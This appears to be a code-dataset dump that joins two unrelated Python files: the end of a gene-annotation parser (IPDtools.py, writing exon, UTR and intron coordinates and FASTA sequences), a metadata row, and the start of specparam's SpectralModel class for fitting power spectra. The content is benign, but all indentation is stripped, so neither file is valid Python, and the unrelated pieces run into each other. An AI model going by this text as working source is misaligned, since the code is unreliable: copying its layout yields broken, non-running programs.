if len(tmp) == 3 and tmp in ["TAA", "TAG", "TGA"] :
stopCodon = tmp
lastCodon = lastCodon + 3
# output UTR and exon
utr = df['UTR']
utrArr = []
if utr:
utrstr = ",".join(utr)
for u in utr :
a, b = u.split("..")
utrArr.append([int(a), int(b)])
else :
utrstr = "NA"
exon = df['exon']
nexon = 0
if exon:
nexon = len(exon)
exonstr = []
for i in range(nexon) :
lst = list(exon[i])
if lst[2] != '' : lst[2] = "pseudo"
if utr:
# merge UTR into exon
c, d = lst[0].split("..")
c = int(c)
d = int(d)
rmv = []
for x in utrArr :
a, b = x
#print(a,b, c, d)
if c == b + 1 :
c = a
rmv.append(x)
elif c > b+1 :
break
if d == a -1 :
d = b
rmv.append(x)
elif d < a-1:
break
#print(a,b, c, d)
for x in rmv : utrArr.remove(x)
lst[0] = str(c) + ".." + str(d)
exonstr.append(lst[2] + lst[1] + ":" + lst[0])
if len(utrArr) > 0 :
# turn unmerged UTR into new exon
for c, d in utrArr:
exonstr.append("utr:" + str(c) + ".." + str(d))
exonstr = ",".join(exonstr)
intron = df['intron']
if intron:
intronstr = []
for i in intron :
a, b = i[0].split("..")
a = int(a)
b = int(b)
l = seq[a - 1 : a + 1]
r = seq[b - 2 : b ]
x = l + "-" + r
if not x in intronstr :
intronstr.append(x)
intronstr.sort()
intronstr = ",".join(intronstr)
else :
intronstr = "NA"
goodtemplate = False
c1 = len(utrstr.split(",")) == 2 # UTR to UTR
#c2 = startCodon == "ATG" and stopCodon in ["TAA", "TAG", "TGA"]
c2 = True #startCodon == "ATG" and stopCodon in ["TAA", "TAG", "TGA"]
if c1 and c2 :
goodtemplate = True
exonArr = []
for x in exon :
a, b = x[0].split("..")
for y in range(int(a), int(b)+1) : exonArr.append(y)
exonArr.sort()
if len(exonArr) != len(cdsArr) and "pseudo" not in exonstr and False:
sys.stderr.write(df['ID'] + ": CDS not euqals to Exon\n")
sys.stderr.write("CDS = " + cdsstr + "\n")
sys.stderr.write("Exon = " + exonstr + "\n")
ostr = ostr + "\t" + "goodTemplate=" + str(goodtemplate)
ostr = ostr + "\t" + "codonShift=" + df['codon_start']
ostr = ostr + "\t" + "startCodon=" + startCodon + ":"
ostr = ostr + str(firstCodon) + ".." + str(firstCodon+2)
ostr = ostr + "\t" + "stopCodon=" + stopCodon + ":"
ostr = ostr + str(lastCodon) + ".." + str(lastCodon+2)
ostr = ostr + "\t" + "CDS=" + cdsstr
ostr = ostr + "\t" + "UTR=" + utrstr
ostr = ostr + "\t" + "nexon=" + str(nexon)
ostr = ostr + "\t" + "exon=" + exonstr
ostr = ostr + "\t" + "intron=" + intronstr
ostr = ostr + "\n"
sys.stdout.write(ostr)
def writeSTDOUTalleleName(df) :
if df['gene'] != "NA" :
headline = df['gene'] + " " + df['allele'] + " " + df['ID'] + " " \
+ df['description'].replace(' ', '_') + " " \
+ str(df['genelength']) + 'bp\n'
sys.stdout.write(headline)
def writeSTDOUTgeneseq(df) :
if df['seqtype'] == "gene" :
s = df['geneSeq']
headline = ">" + df['allele'] + " " + df['ID'] + " " \
+ df['description'].replace(' ', '_') + " " \
+ str(df['genelength']) + 'bp\n'
sys.stdout.write(headline)
for i in range(len(s) // 80 + 1) :
ostr = s[80 * i : 80 * (i + 1)] + '\n'
sys.stdout.write(ostr)
def writeSTDOUTcds(df, verbose) :
seq = df['geneSeq']
if df['CDS'] == None :
if verbose:
sys.stderr.write(' <msg> CDS is missing for ' + df['ID'] + ", skip\n")
return None
cds = ''
regex = re.compile(r'(\d*)..(\d*)')
for i in df['CDS'] :
rg = regex.search(i)
fro = int(rg.group(1)) - 1
to = int(rg.group(2))
cds = cds + seq[fro:to]
headline = ">" + df['allele'] + " " + df['ID'] + " " \
+ "frame=" + df['codon_start'] + " " + str(len(cds)) + 'bp\n'
sys.stdout.write(headline)
for i in range(len(cds) // 80 + 1) :
ostr = cds[80 * i : 80 * (i + 1)] + '\n'
sys.stdout.write(ostr)
| YingZhou001/Immuannot | scripts/scripts/easyipd/IPDtools.py | IPDtools.py | py | 11,239 | python | en | code | 3 | github-code | 50 |
33742333601 | """Base model object, which defines the power spectrum model.
Private Attributes
==================
Private attributes of the model object are documented here.
Data Attributes
---------------
_spectrum_flat : 1d array
Flattened power spectrum, with the aperiodic component removed.
_spectrum_peak_rm : 1d array
Power spectrum, with peaks removed.
Model Component Attributes
--------------------------
_ap_fit : 1d array
Values of the isolated aperiodic fit.
_peak_fit : 1d array
Values of the isolated peak fit.
Internal Settings Attributes
----------------------------
_ap_percentile_thresh : float
Percentile threshold for finding peaks above the aperiodic component.
_ap_guess : list of [float, float, float]
Guess parameters for fitting the aperiodic component.
_ap_bounds : tuple of tuple of float
Upper and lower bounds on fitting aperiodic component.
_cf_bound : float
Parameter bounds for center frequency when fitting gaussians.
_bw_std_edge : float
Bandwidth threshold for edge rejection of peaks, in units of gaussian standard deviation.
_gauss_overlap_thresh : float
Degree of overlap (in units of standard deviation) between gaussian guesses to drop one.
_gauss_std_limits : list of [float, float]
Peak width limits, converted to use for gaussian standard deviation parameter.
This attribute is computed based on `peak_width_limits` and should not be updated directly.
_maxfev : int
The maximum number of calls to the curve fitting function.
_error_metric : str
The error metric to use for post-hoc measures of model fit error.
Run Modes
---------
_debug : bool
Whether the object is set in debug mode.
This should be controlled by using the `set_debug_mode` method.
_check_data, _check_freqs : bool
Whether to check added inputs for incorrect inputs, failing if present.
Frequency data is checked for linear spacing.
Power values are checked for data for NaN or Inf values.
These modes default to True, and can be controlled with the `set_check_modes` method.
Code Notes
----------
Methods without defined docstrings import docs at runtime, from aliased external functions.
"""
import warnings
from copy import deepcopy
import numpy as np
from numpy.linalg import LinAlgError
from scipy.optimize import curve_fit
from specparam.core.utils import unlog
from specparam.core.items import OBJ_DESC
from specparam.core.info import get_indices
from specparam.core.io import save_model, load_json
from specparam.core.reports import save_model_report
from specparam.core.modutils import copy_doc_func_to_method
from specparam.core.utils import group_three, check_array_dim
from specparam.core.funcs import gaussian_function, get_ap_func, infer_ap_func
from specparam.core.jacobians import jacobian_gauss
from specparam.core.errors import (FitError, NoModelError, DataError,
NoDataError, InconsistentDataError)
from specparam.core.strings import (gen_settings_str, gen_model_results_str,
gen_issue_str, gen_width_warning_str)
from specparam.plts.model import plot_model
from specparam.utils.data import trim_spectrum
from specparam.utils.params import compute_gauss_std
from specparam.data import FitResults, ModelRunModes, ModelSettings, SpectrumMetaData
from specparam.data.conversions import model_to_dataframe
from specparam.sim.gen import gen_freqs, gen_aperiodic, gen_periodic, gen_model
###################################################################################################
###################################################################################################
class SpectralModel():
"""Model a power spectrum as a combination of aperiodic and periodic components.
WARNING: frequency and power values inputs must be in linear space.
Passing in logged frequencies and/or power spectra is not detected,
and will silently produce incorrect results.
Parameters
----------
peak_width_limits : tuple of (float, float), optional, default: (0.5, 12.0)
Limits on possible peak width, in Hz, as (lower_bound, upper_bound).
max_n_peaks : int, optional, default: inf
Maximum number of peaks to fit.
min_peak_height : float, optional, default: 0
Absolute threshold for detecting peaks.
This threshold is defined in absolute units of the power spectrum (log power).
peak_threshold : float, optional, default: 2.0
Relative threshold for detecting peaks.
This threshold is defined in relative units of the power spectrum (standard deviation).
aperiodic_mode : {'fixed', 'knee'}
Which approach to take for fitting the aperiodic component.
verbose : bool, optional, default: True
Verbosity mode. If True, prints out warnings and general status updates.
Attributes
----------
freqs : 1d array
Frequency values for the power spectrum.
power_spectrum : 1d array
Power values, stored internally in log10 scale.
freq_range : list of [float, float]
Frequency range of the power spectrum, as [lowest_freq, highest_freq].
freq_res : float
Frequency resolution of the power spectrum.
modeled_spectrum_ : 1d array
The full model fit of the power spectrum, in log10 scale.
aperiodic_params_ : 1d array
Parameters that define the aperiodic fit. As [Offset, (Knee), Exponent].
The knee parameter is only included if aperiodic component is fit with a knee.
peak_params_ : 2d array
Fitted parameter values for the peaks. Each row is a peak, as [CF, PW, BW].
gaussian_params_ : 2d array
Parameters that define the gaussian fit(s).
Each row is a gaussian, as [mean, height, standard deviation].
r_squared_ : float
R-squared of the fit between the input power spectrum and the full model fit.
error_ : float
Error of the full model fit.
n_peaks_ : int
The number of peaks fit in the model.
has_data : bool
Whether data is loaded to the object.
has_model : bool
Whether model results are available in the object.
Notes
-----
- Commonly used abbreviations used in this module include:
CF: center frequency, PW: power, BW: Bandwidth, AP: aperiodic
- Input power spectra must be provided in linear scale.
Internally they are stored in log10 scale, as this is what the model operates upon.
- Input power spectra should be smooth, as overly noisy power spectra may lead to bad fits.
For example, raw FFT inputs are not appropriate. Where possible and appropriate, use
longer time segments for power spectrum calculation to get smoother power spectra,
as this will give better model fits.
- The gaussian params are those that define the gaussian of the fit, where as the peak
params are a modified version, in which the CF of the peak is the mean of the gaussian,
the PW of the peak is the height of the gaussian over and above the aperiodic component,
and the BW of the peak, is 2*std of the gaussian (as 'two sided' bandwidth).
"""
# pylint: disable=attribute-defined-outside-init
def __init__(self, peak_width_limits=(0.5, 12.0), max_n_peaks=np.inf, min_peak_height=0.0,
peak_threshold=2.0, aperiodic_mode='fixed', verbose=True):
"""Initialize model object."""
# Set input settings
self.peak_width_limits = peak_width_limits
self.max_n_peaks = max_n_peaks
self.min_peak_height = min_peak_height
self.peak_threshold = peak_threshold
self.aperiodic_mode = aperiodic_mode
self.verbose = verbose
## PRIVATE SETTINGS
# Percentile threshold, to select points from a flat spectrum for an initial aperiodic fit
# Points are selected at a low percentile value to restrict to non-peak points
self._ap_percentile_thresh = 0.025
# Guess parameters for aperiodic fitting, [offset, knee, exponent]
# If offset guess is None, the first value of the power spectrum is used as offset guess
# If exponent guess is None, the abs(log-log slope) of first & last points is used
self._ap_guess = (None, 0, None)
# Bounds for aperiodic fitting, as: ((offset_low_bound, knee_low_bound, exp_low_bound),
# (offset_high_bound, knee_high_bound, exp_high_bound))
# By default, aperiodic fitting is unbound, but can be restricted here
# Even if fitting without knee, leave bounds for knee (they are dropped later)
self._ap_bounds = ((-np.inf, -np.inf, -np.inf), (np.inf, np.inf, np.inf))
# Threshold for how far a peak has to be from edge to keep.
# This is defined in units of gaussian standard deviation
self._bw_std_edge = 1.0
# Degree of overlap between gaussians for one to be dropped
# This is defined in units of gaussian standard deviation
self._gauss_overlap_thresh = 0.75
# Parameter bounds for center frequency when fitting gaussians, in terms of +/- std dev
self._cf_bound = 1.5
# The error metric to calculate, post model fitting. See `_calc_error` for options
# Note: this is for checking error post fitting, not an objective function for fitting
self._error_metric = 'MAE'
## PRIVATE CURVE_FIT SETTINGS
# The maximum number of calls to the curve fitting function
self._maxfev = 5000
# The tolerance setting for curve fitting (see scipy.curve_fit - ftol / xtol / gtol)
# Here reduce tolerance to speed fitting. Set value to 1e-8 to match curve_fit default
self._tol = 0.00001
## RUN MODES
# Set default debug mode - controls if an error is raised if model fitting is unsuccessful
self._debug = False
# Set default data checking modes - controls which checks get run on input data
# check_freqs: checks the frequency values, and raises an error for uneven spacing
self._check_freqs = True
# check_data: checks the power values and raises an error for any NaN / Inf values
self._check_data = True
# Set internal settings, based on inputs, and initialize data & results attributes
self._reset_internal_settings()
self._reset_data_results(True, True, True)
@property
def has_data(self):
"""Indicator for if the object contains data."""
return True if np.any(self.power_spectrum) else False
@property
def has_model(self):
"""Indicator for if the object contains a model fit.
Notes
-----
This check uses the aperiodic params, which are:
- nan if no model has been fit
- necessarily defined, as floats, if model has been fit
"""
return True if not np.all(np.isnan(self.aperiodic_params_)) else False
@property
def n_peaks_(self):
"""How many peaks were fit in the model."""
return self.peak_params_.shape[0] if self.has_model else None
def _reset_internal_settings(self):
"""Set, or reset, internal settings, based on what is provided in init.
Notes
-----
These settings are for internal use, based on what is provided to, or set in `__init__`.
They should not be altered by the user.
"""
# Only update these settings if other relevant settings are available
if self.peak_width_limits:
# Bandwidth limits are given in 2-sided peak bandwidth
# Convert to gaussian std parameter limits
self._gauss_std_limits = tuple(bwl / 2 for bwl in self.peak_width_limits)
# Otherwise, assume settings are unknown (have been cleared) and set to None
else:
self._gauss_std_limits = None
def _reset_data_results(self, clear_freqs=False, clear_spectrum=False, clear_results=False):
"""Set, or reset, data & results attributes to empty.
Parameters
----------
clear_freqs : bool, optional, default: False
Whether to clear frequency attributes.
clear_spectrum : bool, optional, default: False
Whether to clear power spectrum attribute.
clear_results : bool, optional, default: False
Whether to clear model results attributes.
"""
if clear_freqs:
self.freqs = None
self.freq_range = None
self.freq_res = None
if clear_spectrum:
self.power_spectrum = None
if clear_results:
self.aperiodic_params_ = np.array([np.nan] * \
(2 if self.aperiodic_mode == 'fixed' else 3))
self.gaussian_params_ = np.empty([0, 3])
self.peak_params_ = np.empty([0, 3])
self.r_squared_ = np.nan
self.error_ = np.nan
self.modeled_spectrum_ = None
self._spectrum_flat = None
self._spectrum_peak_rm = None
self._ap_fit = None
self._peak_fit = None
def add_data(self, freqs, power_spectrum, freq_range=None, clear_results=True):
"""Add data (frequencies, and power spectrum values) to the current object.
Parameters
----------
freqs : 1d array
Frequency values for the power spectrum, in linear space.
power_spectrum : 1d array
Power spectrum values, which must be input in linear space.
freq_range : list of [float, float], optional
Frequency range to restrict power spectrum to.
If not provided, keeps the entire range.
clear_results : bool, optional, default: True
Whether to clear prior results, if any are present in the object.
This should only be set to False if data for the current results are being re-added.
Notes
-----
If called on an object with existing data and/or results
they will be cleared by this method call.
"""
# If any data is already present, then clear previous data
# Also clear results, if present, unless indicated not to
# This is to ensure object consistency of all data & results
self._reset_data_results(clear_freqs=self.has_data,
clear_spectrum=self.has_data,
clear_results=self.has_model and clear_results)
self.freqs, self.power_spectrum, self.freq_range, self.freq_res = \
self._prepare_data(freqs, power_spectrum, freq_range, 1)
def add_settings(self, settings):
"""Add settings into object from a ModelSettings object.
Parameters
----------
settings : ModelSettings
A data object containing the settings for a power spectrum model.
"""
for setting in OBJ_DESC['settings']:
setattr(self, setting, getattr(settings, setting))
self._check_loaded_settings(settings._asdict())
def add_meta_data(self, meta_data):
"""Add data information into object from a SpectrumMetaData object.
Parameters
----------
meta_data : SpectrumMetaData
A meta data object containing meta data information.
"""
for meta_dat in OBJ_DESC['meta_data']:
setattr(self, meta_dat, getattr(meta_data, meta_dat))
self._regenerate_freqs()
def add_results(self, results):
"""Add results data into object from a FitResults object.
Parameters
----------
results : FitResults
A data object containing the results from fitting a power spectrum model.
"""
self.aperiodic_params_ = results.aperiodic_params
self.gaussian_params_ = results.gaussian_params
self.peak_params_ = results.peak_params
self.r_squared_ = results.r_squared
self.error_ = results.error
self._check_loaded_results(results._asdict())
def report(self, freqs=None, power_spectrum=None, freq_range=None,
plt_log=False, plot_full_range=False, **plot_kwargs):
"""Run model fit, and display a report, which includes a plot, and printed results.
Parameters
----------
freqs : 1d array, optional
Frequency values for the power spectrum.
power_spectrum : 1d array, optional
Power values, which must be input in linear space.
freq_range : list of [float, float], optional
Frequency range to fit the model to.
If not provided, fits across the entire given range.
plt_log : bool, optional, default: False
Whether or not to plot the frequency axis in log space.
plot_full_range : bool, default: False
If True, plots the full range of the given power spectrum.
Only relevant / effective if `freqs` and `power_spectrum` passed in in this call.
**plot_kwargs
Keyword arguments to pass into the plot method.
Plot options with a name conflict be passed by pre-pending `plot_`.
e.g. `freqs`, `power_spectrum` and `freq_range`.
Notes
-----
Data is optional, if data has already been added to the object.
"""
self.fit(freqs, power_spectrum, freq_range)
self.plot(plt_log=plt_log,
freqs=freqs if plot_full_range else plot_kwargs.pop('plot_freqs', None),
power_spectrum=power_spectrum if \
plot_full_range else plot_kwargs.pop('plot_power_spectrum', None),
freq_range=plot_kwargs.pop('plot_freq_range', None),
**plot_kwargs)
self.print_results(concise=False)
def fit(self, freqs=None, power_spectrum=None, freq_range=None):
"""Fit the full power spectrum as a combination of periodic and aperiodic components.
Parameters
----------
freqs : 1d array, optional
Frequency values for the power spectrum, in linear space.
power_spectrum : 1d array, optional
Power values, which must be input in linear space.
freq_range : list of [float, float], optional
Frequency range to restrict power spectrum to.
If not provided, keeps the entire range.
Raises
------
NoDataError
If no data is available to fit.
FitError
If model fitting fails to fit. Only raised in debug mode.
Notes
-----
Data is optional, if data has already been added to the object.
"""
# If freqs & power_spectrum provided together, add data to object.
if freqs is not None and power_spectrum is not None:
self.add_data(freqs, power_spectrum, freq_range)
# If power spectrum provided alone, add to object, and use existing frequency data
# Note: be careful passing in power_spectrum data like this:
# It assumes the power_spectrum is already logged, with correct freq_range
elif isinstance(power_spectrum, np.ndarray):
self.power_spectrum = power_spectrum
# Check that data is available
if not self.has_data:
raise NoDataError("No data available to fit, can not proceed.")
# Check and warn about width limits (if in verbose mode)
if self.verbose:
self._check_width_limits()
# In rare cases, the model fails to fit, and so uses try / except
try:
# If not set to fail on NaN or Inf data at add time, check data here
# This serves as a catch all for curve_fits which will fail given NaN or Inf
# Because FitError's are by default caught, this allows fitting to continue
if not self._check_data:
if np.any(np.isinf(self.power_spectrum)) or np.any(np.isnan(self.power_spectrum)):
raise FitError("Model fitting was skipped because there are NaN or Inf "
"values in the data, which preclude model fitting.")
# Fit the aperiodic component
self.aperiodic_params_ = self._robust_ap_fit(self.freqs, self.power_spectrum)
self._ap_fit = gen_aperiodic(self.freqs, self.aperiodic_params_)
# Flatten the power spectrum using fit aperiodic fit
self._spectrum_flat = self.power_spectrum - self._ap_fit
# Find peaks, and fit them with gaussians
self.gaussian_params_ = self._fit_peaks(np.copy(self._spectrum_flat))
# Calculate the peak fit
# Note: if no peaks are found, this creates a flat (all zero) peak fit
self._peak_fit = gen_periodic(self.freqs, np.ndarray.flatten(self.gaussian_params_))
# Create peak-removed (but not flattened) power spectrum
self._spectrum_peak_rm = self.power_spectrum - self._peak_fit
# Run final aperiodic fit on peak-removed power spectrum
# This overwrites previous aperiodic fit, and recomputes the flattened spectrum
self.aperiodic_params_ = self._simple_ap_fit(self.freqs, self._spectrum_peak_rm)
self._ap_fit = gen_aperiodic(self.freqs, self.aperiodic_params_)
self._spectrum_flat = self.power_spectrum - self._ap_fit
# Create full power_spectrum model fit
self.modeled_spectrum_ = self._peak_fit + self._ap_fit
# Convert gaussian definitions to peak parameters
self.peak_params_ = self._create_peak_params(self.gaussian_params_)
# Calculate R^2 and error of the model fit
self._calc_r_squared()
self._calc_error()
except FitError:
# If in debug mode, re-raise the error
if self._debug:
raise
# Clear any interim model results that may have run
# Partial model results shouldn't be interpreted in light of overall failure
self._reset_data_results(clear_results=True)
# Print out status
if self.verbose:
print("Model fitting was unsuccessful.")
def print_settings(self, description=False, concise=False):
"""Print out the current settings.
Parameters
----------
description : bool, optional, default: False
Whether to print out a description with current settings.
concise : bool, optional, default: False
Whether to print the report in a concise mode, or not.
"""
print(gen_settings_str(self, description, concise))
def print_results(self, concise=False):
"""Print out model fitting results.
Parameters
----------
concise : bool, optional, default: False
Whether to print the report in a concise mode, or not.
"""
print(gen_model_results_str(self, concise))
@staticmethod
def print_report_issue(concise=False):
"""Prints instructions on how to report bugs and/or problematic fits.
Parameters
----------
concise : bool, optional, default: False
Whether to print the report in a concise mode, or not.
"""
print(gen_issue_str(concise))
def get_settings(self):
"""Return user defined settings of the current object.
Returns
-------
ModelSettings
Object containing the settings from the current object.
"""
return ModelSettings(**{key : getattr(self, key) \
for key in OBJ_DESC['settings']})
def get_run_modes(self):
"""Return run modes of the current object.
Returns
-------
ModelRunModes
Object containing the run modes from the current object.
"""
return ModelRunModes(**{key.strip('_') : getattr(self, key) \
for key in OBJ_DESC['run_modes']})
def get_meta_data(self):
"""Return data information from the current object.
Returns
-------
SpectrumMetaData
Object containing meta data from the current object.
"""
return SpectrumMetaData(**{key : getattr(self, key) \
for key in OBJ_DESC['meta_data']})
def get_data(self, component='full', space='log'):
"""Get a data component.
Parameters
----------
component : {'full', 'aperiodic', 'peak'}
Which data component to return.
'full' - full power spectrum
'aperiodic' - isolated aperiodic data component
'peak' - isolated peak data component
space : {'log', 'linear'}
Which space to return the data component in.
'log' - returns in log10 space.
'linear' - returns in linear space.
Returns
-------
output : 1d array
Specified data component, in specified spacing.
Notes
-----
The 'space' parameter doesn't just define the spacing of the data component
values, but rather defines the space of the additive data definition such that
`power_spectrum = aperiodic_component + peak_component`.
With space set as 'log', this combination holds in log space.
With space set as 'linear', this combination holds in linear space.
"""
if not self.has_data:
raise NoDataError("No data available to fit, can not proceed.")
assert space in ['linear', 'log'], "Input for 'space' invalid."
if component == 'full':
output = self.power_spectrum if space == 'log' else unlog(self.power_spectrum)
elif component == 'aperiodic':
output = self._spectrum_peak_rm if space == 'log' else \
unlog(self.power_spectrum) / unlog(self._peak_fit)
elif component == 'peak':
output = self._spectrum_flat if space == 'log' else \
unlog(self.power_spectrum) - unlog(self._ap_fit)
else:
raise ValueError('Input for component invalid.')
return output
def get_model(self, component='full', space='log'):
"""Get a model component.
Parameters
----------
component : {'full', 'aperiodic', 'peak'}
Which model component to return.
'full' - full model
'aperiodic' - isolated aperiodic model component
'peak' - isolated peak model component
space : {'log', 'linear'}
Which space to return the model component in.
'log' - returns in log10 space.
'linear' - returns in linear space.
Returns
-------
output : 1d array
Specified model component, in specified spacing.
Notes
-----
The 'space' parameter doesn't just define the spacing of the model component
values, but rather defines the space of the additive model such that
`model = aperiodic_component + peak_component`.
With space set as 'log', this combination holds in log space.
With space set as 'linear', this combination holds in linear space.
"""
if not self.has_model:
raise NoModelError("No model fit results are available, can not proceed.")
assert space in ['linear', 'log'], "Input for 'space' invalid."
if component == 'full':
output = self.modeled_spectrum_ if space == 'log' else unlog(self.modeled_spectrum_)
elif component == 'aperiodic':
output = self._ap_fit if space == 'log' else unlog(self._ap_fit)
elif component == 'peak':
output = self._peak_fit if space == 'log' else \
unlog(self.modeled_spectrum_) - unlog(self._ap_fit)
else:
raise ValueError('Input for component invalid.')
return output
def get_params(self, name, col=None):
"""Return model fit parameters for specified feature(s).
Parameters
----------
name : {'aperiodic_params', 'peak_params', 'gaussian_params', 'error', 'r_squared'}
Name of the data field to extract.
col : {'CF', 'PW', 'BW', 'offset', 'knee', 'exponent'} or int, optional
Column name / index to extract from selected data, if requested.
Only used for name of {'aperiodic_params', 'peak_params', 'gaussian_params'}.
Returns
-------
out : float or 1d array
Requested data.
Raises
------
NoModelError
If there are no model fit parameters available to return.
Notes
-----
If there are no fit peak (no peak parameters), this method will return NaN.
"""
if not self.has_model:
raise NoModelError("No model fit results are available to extract, can not proceed.")
# If col specified as string, get mapping back to integer
if isinstance(col, str):
col = get_indices(self.aperiodic_mode)[col]
# Allow for shortcut alias, without adding `_params`
if name in ['aperiodic', 'peak', 'gaussian']:
name = name + '_params'
# Extract the request data field from object
out = getattr(self, name + '_')
# Periodic values can be empty arrays and if so, replace with NaN array
if isinstance(out, np.ndarray) and out.size == 0:
out = np.array([np.nan, np.nan, np.nan])
# Select out a specific column, if requested
if col is not None:
# Extract column, & if result is a single value in an array, unpack from array
out = out[col] if out.ndim == 1 else out[:, col]
out = out[0] if isinstance(out, np.ndarray) and out.size == 1 else out
return out
def get_results(self):
"""Return model fit parameters and goodness of fit metrics.
Returns
-------
FitResults
Object containing the model fit results from the current object.
"""
return FitResults(**{key.strip('_') : getattr(self, key) \
for key in OBJ_DESC['results']})
@copy_doc_func_to_method(plot_model)
def plot(self, plot_peaks=None, plot_aperiodic=True, freqs=None, power_spectrum=None,
freq_range=None, plt_log=False, add_legend=True, ax=None, data_kwargs=None,
model_kwargs=None, aperiodic_kwargs=None, peak_kwargs=None, **plot_kwargs):
plot_model(self, plot_peaks=plot_peaks, plot_aperiodic=plot_aperiodic, freqs=freqs,
power_spectrum=power_spectrum, freq_range=freq_range, plt_log=plt_log,
add_legend=add_legend, ax=ax, data_kwargs=data_kwargs, model_kwargs=model_kwargs,
aperiodic_kwargs=aperiodic_kwargs, peak_kwargs=peak_kwargs, **plot_kwargs)
@copy_doc_func_to_method(save_model_report)
def save_report(self, file_name, file_path=None, plt_log=False,
add_settings=True, **plot_kwargs):
save_model_report(self, file_name, file_path, plt_log, add_settings, **plot_kwargs)
@copy_doc_func_to_method(save_model)
def save(self, file_name, file_path=None, append=False,
save_results=False, save_settings=False, save_data=False):
save_model(self, file_name, file_path, append, save_results, save_settings, save_data)
def load(self, file_name, file_path=None, regenerate=True):
"""Load in a data file to the current object.
Parameters
----------
file_name : str or FileObject
File to load data from.
file_path : Path or str, optional
Path to directory to load from. If None, loads from current directory.
regenerate : bool, optional, default: True
Whether to regenerate the model fit from the loaded data, if data is available.
"""
# Reset data in object, so old data can't interfere
self._reset_data_results(True, True, True)
# Load JSON file, add to self and check loaded data
data = load_json(file_name, file_path)
self._add_from_dict(data)
self._check_loaded_settings(data)
self._check_loaded_results(data)
# Regenerate model components, based on what is available
if regenerate:
if self.freq_res:
self._regenerate_freqs()
if np.all(self.freqs) and np.all(self.aperiodic_params_):
self._regenerate_model()
def copy(self):
"""Return a copy of the current object."""
return deepcopy(self)
def set_debug_mode(self, debug):
"""Set debug mode, which controls if an error is raised if model fitting is unsuccessful.
Parameters
----------
debug : bool
Whether to run in debug mode.
"""
self._debug = debug
def set_check_modes(self, check_freqs=None, check_data=None):
"""Set check modes, which controls if an error is raised based on check on the inputs.
Parameters
----------
check_freqs : bool, optional
Whether to run in check freqs mode, which checks the frequency data.
check_data : bool, optional
Whether to run in check data mode, which checks the power spectrum values data.
"""
if check_freqs is not None:
self._check_freqs = check_freqs
if check_data is not None:
self._check_data = check_data
# This kept for backwards compatibility, but to be removed in 2.0 in favor of `set_check_modes`
def set_check_data_mode(self, check_data):
"""Set check data mode, which controls if an error is raised if NaN or Inf data are added.
Parameters
----------
check_data : bool
Whether to run in check data mode.
"""
self.set_check_modes(check_data=check_data)
def set_run_modes(self, debug, check_freqs, check_data):
"""Simultaneously set all run modes.
Parameters
----------
debug : bool
Whether to run in debug mode.
check_freqs : bool
Whether to run in check freqs mode.
check_data : bool
Whether to run in check data mode.
"""
self.set_debug_mode(debug)
self.set_check_modes(check_freqs, check_data)
def to_df(self, peak_org):
"""Convert and extract the model results as a pandas object.
Parameters
----------
peak_org : int or Bands
How to organize peaks.
If int, extracts the first n peaks.
If Bands, extracts peaks based on band definitions.
Returns
-------
pd.Series
Model results organized into a pandas object.
"""
return model_to_dataframe(self.get_results(), peak_org)
def _check_width_limits(self):
"""Check and warn about peak width limits / frequency resolution interaction."""
# Check peak width limits against frequency resolution and warn if too close
if 1.5 * self.freq_res >= self.peak_width_limits[0]:
print(gen_width_warning_str(self.freq_res, self.peak_width_limits[0]))
def _simple_ap_fit(self, freqs, power_spectrum):
"""Fit the aperiodic component of the power spectrum.
Parameters
----------
freqs : 1d array
Frequency values for the power_spectrum, in linear scale.
power_spectrum : 1d array
Power values, in log10 scale.
Returns
-------
aperiodic_params : 1d array
Parameter estimates for aperiodic fit.
"""
# Get the guess parameters and/or calculate from the data, as needed
# Note that these are collected as lists, to concatenate with or without knee later
off_guess = [power_spectrum[0] if not self._ap_guess[0] else self._ap_guess[0]]
kne_guess = [self._ap_guess[1]] if self.aperiodic_mode == 'knee' else []
exp_guess = [np.abs((self.power_spectrum[-1] - self.power_spectrum[0]) /
(np.log10(self.freqs[-1]) - np.log10(self.freqs[0])))
if not self._ap_guess[2] else self._ap_guess[2]]
# Get bounds for aperiodic fitting, dropping knee bound if not set to fit knee
ap_bounds = self._ap_bounds if self.aperiodic_mode == 'knee' \
else tuple(bound[0::2] for bound in self._ap_bounds)
# Collect together guess parameters
guess = np.array(off_guess + kne_guess + exp_guess)
# Ignore warnings that are raised in curve_fit
# A runtime warning can occur while exploring parameters in curve fitting
# This doesn't effect outcome - it won't settle on an answer that does this
# It happens if / when b < 0 & |b| > x**2, as it leads to log of a negative number
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
aperiodic_params, _ = curve_fit(get_ap_func(self.aperiodic_mode),
freqs, power_spectrum, p0=guess,
maxfev=self._maxfev, bounds=ap_bounds,
ftol=self._tol, xtol=self._tol, gtol=self._tol,
check_finite=False)
except RuntimeError as excp:
error_msg = ("Model fitting failed due to not finding parameters in "
"the simple aperiodic component fit.")
raise FitError(error_msg) from excp
return aperiodic_params
def _robust_ap_fit(self, freqs, power_spectrum):
"""Fit the aperiodic component of the power spectrum robustly, ignoring outliers.
Parameters
----------
freqs : 1d array
Frequency values for the power spectrum, in linear scale.
power_spectrum : 1d array
Power values, in log10 scale.
Returns
-------
aperiodic_params : 1d array
Parameter estimates for aperiodic fit.
Raises
------
FitError
If the fitting encounters an error.
"""
# Do a quick, initial aperiodic fit
popt = self._simple_ap_fit(freqs, power_spectrum)
initial_fit = gen_aperiodic(freqs, popt)
# Flatten power_spectrum based on initial aperiodic fit
flatspec = power_spectrum - initial_fit
# Flatten outliers, defined as any points that drop below 0
flatspec[flatspec < 0] = 0
# Use percentile threshold, in terms of # of points, to extract and re-fit
perc_thresh = np.percentile(flatspec, self._ap_percentile_thresh)
perc_mask = flatspec <= perc_thresh
freqs_ignore = freqs[perc_mask]
spectrum_ignore = power_spectrum[perc_mask]
# Get bounds for aperiodic fitting, dropping knee bound if not set to fit knee
ap_bounds = self._ap_bounds if self.aperiodic_mode == 'knee' \
else tuple(bound[0::2] for bound in self._ap_bounds)
# Second aperiodic fit - using results of first fit as guess parameters
# See note in _simple_ap_fit about warnings
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
aperiodic_params, _ = curve_fit(get_ap_func(self.aperiodic_mode),
freqs_ignore, spectrum_ignore, p0=popt,
maxfev=self._maxfev, bounds=ap_bounds,
ftol=self._tol, xtol=self._tol, gtol=self._tol,
check_finite=False)
except RuntimeError as excp:
error_msg = ("Model fitting failed due to not finding "
"parameters in the robust aperiodic fit.")
raise FitError(error_msg) from excp
except TypeError as excp:
error_msg = ("Model fitting failed due to sub-sampling "
"in the robust aperiodic fit.")
raise FitError(error_msg) from excp
